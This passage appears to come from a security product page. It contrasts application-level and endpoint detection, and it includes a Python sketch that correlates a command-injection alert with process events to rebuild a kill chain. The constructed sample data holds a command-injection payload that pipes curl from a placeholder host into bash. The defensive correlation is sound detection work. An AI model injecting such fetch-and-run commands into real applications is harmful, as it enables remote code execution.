The detection gap

| ADR alone | EDR alone | ADR + EDR correlated |
| --- | --- | --- |
| Confirmed command injection in subprocess.run() — but what happened after the shell spawned? | Suspicious process: java → bash → curl. But why? Which vulnerability? Which function? | Confirmed: command injection in subprocess.run() led to reverse shell via curl \| bash. Full kill chain from exploit to post-exploitation. |
| Sees the injection and possibly the outbound connection. Cannot see file drops, persistence mechanisms, or lateral movement. | Sees the process tree. Cannot tell AppSec which function to patch — the ticket would be “investigate your Python app.” | AppSec gets the exact function. SOC gets the full impact. Response is surgical, not a fishing expedition. |
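The correlation the table describes, as an added illustration that is not code from the page or from any vendor product: a constructed application-layer alert (vulnerable sink, PID, timestamp) is joined with constructed endpoint process events by walking the process subtree the app process spawned inside a time window, yielding both the function to patch and the post-exploitation chain. The event classes and field names are assumptions for the example.

```python
from dataclasses import dataclass

@dataclass
class AdrAlert:            # hypothetical ADR alert: what the app-layer sensor knows
    host: str
    pid: int
    ts: float
    vuln: str              # e.g. "command injection"
    sink: str              # the vulnerable function, e.g. "subprocess.run"
    payload: str

@dataclass
class ProcEvent:           # hypothetical EDR process-creation event
    host: str
    pid: int
    ppid: int
    ts: float
    image: str
    cmdline: str

def descendants(events, root_pid, host, start, window):
    """Process events in the subtree rooted at root_pid on the same host, within the window."""
    tree, frontier = [], {root_pid}
    for ev in sorted(events, key=lambda e: e.ts):   # time order so parents precede children
        if ev.host == host and start <= ev.ts <= start + window and ev.ppid in frontier:
            tree.append(ev)
            frontier.add(ev.pid)
    return tree

def correlate(alert, events, window=60.0):
    """Join the ADR alert with the EDR process subtree spawned by the vulnerable app process."""
    chain = descendants(events, alert.pid, alert.host, alert.ts, window)
    return {
        "vulnerability": alert.vuln,
        "sink": alert.sink,                               # what AppSec needs: the function to fix
        "kill_chain": [ev.image for ev in chain],         # what the SOC needs: full impact
        "outbound": [ev.cmdline for ev in chain if ev.image in ("curl", "wget")],
    }

# Constructed sample telemetry (not real data); example.invalid is a reserved placeholder domain.
ALERT = AdrAlert("web-01", 4242, 1000.0, "command injection", "subprocess.run",
                 "; curl http://example.invalid/x | bash")
EVENTS = [
    ProcEvent("web-01", 4243, 4242, 1000.5, "bash", "bash -c 'curl http://example.invalid/x | bash'"),
    ProcEvent("web-01", 4244, 4243, 1001.0, "curl", "curl http://example.invalid/x"),
    ProcEvent("web-01", 4245, 4243, 1001.2, "bash", "bash"),
    ProcEvent("web-01", 9001, 1, 1002.0, "cron", "cron"),     # unrelated process, must be excluded
    ProcEvent("web-01", 4246, 4242, 2000.0, "bash", "bash"),  # outside the window, must be excluded
]

if __name__ == "__main__":
    print(correlate(ALERT, EVENTS))
```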